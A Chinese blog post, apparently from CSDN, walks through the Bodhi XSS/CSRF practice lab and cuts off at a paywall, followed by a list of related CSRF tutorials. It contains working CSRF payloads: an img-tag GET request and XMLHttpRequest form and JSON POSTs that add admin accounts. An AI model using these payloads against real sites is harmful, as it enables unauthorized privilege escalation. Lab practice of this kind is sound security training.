一个CSRF靶场练习

最新推荐文章于 2025-03-03 13:50:25 发布
最新推荐文章于 2025-03-03 13:50:25 发布
阅读量2k 收藏 7
点赞数 2
分类专栏: 渗透 文章标签: 渗透 CSRF XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/NEARU/article/details/103347290
版权

xss+csrf的漏洞测试小靶场
难度递升的6个题目,第6个的技巧还是有的:正则取数据,延时请求。
靶场下载地址:http://github.com/amolnaik4/bodhi

靶场逻辑:
一个留言板功能(另一个上传html文件作为漏洞点)作为漏洞点+后台一个进程(admin_bot.py)模拟管理员访问留言板的内容。

文章目录

代码运行

由于代码原来是用docker方式的启动,因此需要对代码做些修改

  1. firefox?? or chrome and its driver in admin_bot.py
  2. uploads another_server的目录代码 调整 在 in admin_bot.py and server_8000.py

poc

直接给出的方式。

1.get csrf

能达到get请求就可以

<img src="/add_admin?username=admin111&password=admin111&isAdmin=yes&submit=Add User" />

2.post csrf

post请求可以有两种方式

  1. 虚拟表单提交
  2. 参考异步请求的方式
1. 虚拟表单

2. 异步请求
  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded;”);

<script language="javascript">
var url = "/add_admin";var xmlhttp;
if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState===4&&xmlhttp.status===200){var b=3;}};
xmlhttp.open("POST",url,true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
var data="username=admin222&password=admin222&isAdmin=yes&submit=Add User";
xmlhttp.send(data);
</script>

3.JSON based CSRF

  1. 构造XMLHttpRequest对象
  2. 设置请求头
  3. 然后使用其发送异步请求

xmlhttp.setRequestHeader(“Content-type”,“application/json”)

<script language="javascript">var xmlhttp;if (window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}xmlhttp.onreadystatechange=function(){if (xmlhttp.readyState===4 && xmlhttp.status===200){var b=3;}};xmlhttp.open("POST","/add_admin",true);xmlhttp.setRequestHeader("Content-type","application/json");var data = {"username":"admin333","password":"admin333","isAdmin":"yes","submit":"Add User"};var data_json = JSON.stringify(data);xmlhttp.send(data_json);</script>

4.XML b

最低0.47元/天 解锁文章
DVWA靶场练习三—CSRF
afei001
05-04 782
CSRF介绍 CSRF跨站点请求伪造(Cross-Site Request Forgery)是一种攻击,它迫使最终用户在当前已通过身份验证的Web应用程序上执行不需要的操作。CSRF攻击专门针对状态更改请求而不是数据窃取,因为攻击者无法看到对伪造请求的响应。在社交工程的一点帮助下(例如通过电子邮件或聊天发送链接),攻击者可能会欺骗Web应用程序的用户执行攻击者选择的操作。如果...
csrf环境搭建
qq_30854761的博客
04-25 382
CSRF概念 CSRF(cross-site request forgery):跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 更新apt源 添加dokcer官方的GPG key curl -fsSL https://download.docker.com/linux/ubuntu/gpg |su..
DVWA练习CSRF
dz919908651的博客
08-22 2588
DVWA练习CSRF 本博客将记录在web安全问题中一种常见的漏洞——“CSRF”漏洞的实践演练。首先阐述CSRF漏洞的概念,原理,最后展示基于DVWA的各种等级的CSRFCSRF概念 CSRF(cross-site request forgery):跨站请求伪造漏洞。 概念:利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 DVWA跨站请求...
CSRF靶场练习
Flynn的博客
03-22 2121
Bodhi - Client-side Vulnerability Playground CSRF
CSRF实践】DVWA靶场CSRF实践
最新发布
weixin_40433003的博客
03-03 1188
CSRF(Cross-site request forgery),中文名叫做“跨站请求伪造”,也被称作“one click attack/session riding”,缩写为“CSRF/XSRF”。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,一但用户点击,攻击也就完成了。同“XSS”的区别在于,CSRF是借助用户权限完成攻击,攻击者并没有拿到权限;而XSS是直接盗取用户甚至管理员的权限进行攻击,从而造成破坏。
pikachu----csrf练习
ptxybird的博客
06-16 302
pikachu--CSRF跨站请求伪造练习
CSRF实例
qq_43592364的博客
04-19 429
DVWA 首先打开DVWA的环境,此次实例是修改自己的密码,然后将别人的密码也改为自己的密码 正常登陆如下图,点击CSRF进入修改密码的部分,修改自己的密码并抓包 本次是将默认密码password改为123,抓包 我们用这个包来生成一个CSRF的表单让别人去点击 (前提是别人登录状态,浏览器有cookie生成) 生成一个CSRF的表单 我们复制这一段html的代码,在桌面新建一个html...
(三)CSRF实例
weixin_43047908的博客
04-12 616
CSRF vulnerability with no defenses 电子邮件更改功能容易受到CSRF的攻击。 通过Burp Suite代理访问流量,登录到帐户,更新电子邮件,然后在代理历史记录中查找结果请求。 构造Poc: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')&lt
CSRF靶场通关合集
记录开发和安全学习过程中的点点滴滴
07-07 1017
最进系统的将从web渗透到内网渗透的知识点做一个回顾,同时结合一些实战的案例来演示,下面是对刚开始学习时对靶场一个总结.
csrf靶场DVWA
12-29
为了构造一个有效的Referer,在攻击服务器上创建新的HTML页面并命名为`change_192.168.112.188.html`,其内容如下所示: ```html <a href="http://192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456...
跨站请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 4690
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
CSRF漏洞靶场笔记
矜庄寂寥的博客
11-30 998
目录简介CSRF攻击步骤CSRF靶场记录CSRF(get)CSRF(post)CSRF(token验证) 简介 CSRF(Cross-site request forgery)全称为跨转请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗器其点击恶意链接或访问包含攻击代码的网页,在受害人不知情的情况下以受害人身份享服务器发送请求(如转账、改密等)。 由于已经获取了受害者的身份认证信息,在服务器看来,所有的请求均为合法正常的 CSRF攻击步骤 下面是以修改密码为例的简略流程图
CSRF实战靶场 --致谢大哥
weixin_30791095的博客
06-17 338
0X01无防护GET类型CSRF(伪造添加成员请求) 环境 靶机管理登陆 192.168.1.132 本机 192.168.1.5 首先我们登陆 test账号 然后点击 添加用户 构造出我们的url 然后发送给已经登陆的管理员 管理 点开连接 可以看见我们添加成功 0X02无防护POST类型csrf-伪造出添加成员的请求 你想让受害者执行的页面构造poc 大哥说用bu...
Pikachu漏洞练习平台实验——CSRF(三)
dishan4749253的博客
09-25 5027
概述   - 攻击场景例子   - CSRF攻击需要条件   - CSRFXSS的区别   - 如何确认一个目标站点是否有CSRF漏洞 CSRF(get) CSRF(post) CSRF(token) 防护措施 概述 CSRF 是Cross Site Request Forgery的 简称,中文...
Pikachu 漏洞练习平台 --CSRF漏洞
08-17 649
1、CSRF(get) 先点击右上角的提示,看到有好几个用户呢,用vince进行登录 登录后修改个人信息 在burpsuite找到这个请求,右键send to repeater 修改页面内容点击go 刷新靶场,看到页面内容被篡改啦 如果被攻击者此时登录状态或cookie/session没有过期,则她的信息被篡改,存在csrf漏洞 2、CSRF(post) 同理,登录后修改请求,页面信息被篡改 3、CSRF token 试了半天没法篡改了,原来这个例子是告诉我们 ...
CSRF漏洞实战靶场笔记
weixin_30367543的博客
06-13 1001
记录下自己写的CSRF漏洞靶场的writeup,包括了大部分的CSRF实战场景,做个笔记。 0x01无防护GET类型csrf(伪造添加成员请求) 这一关没有任何csrf访问措施 首先我们登录test用户 发现有个添加成员功能 用test账号添加发现只有admin才可以添加 现在用另一个浏览器 ,这里用的搜狗浏览器来登录admin账号 ...
CSRF漏洞以及靶场(史上最详细)
qq_34598847的博客
10-17 1670
产生原因:服务器端没有对用户提交的数据进行严格的把控,导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器利用方式:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的原理:攻击者盗用了你的身份,以你的名义发送恶意请求危害:以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。
网络安全实训一(dami靶场搭建,XSSCSRF、模板、任意文件删除添加、框架、密码爆破漏洞)
Wrop的博客
08-14 534
介绍了部分漏洞的利用方法和环境搭建
CSRF(跨站请求伪造)漏洞 (带靶场演示+漏洞挖掘)
wudideaqing的博客
06-14 3216
链接点击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值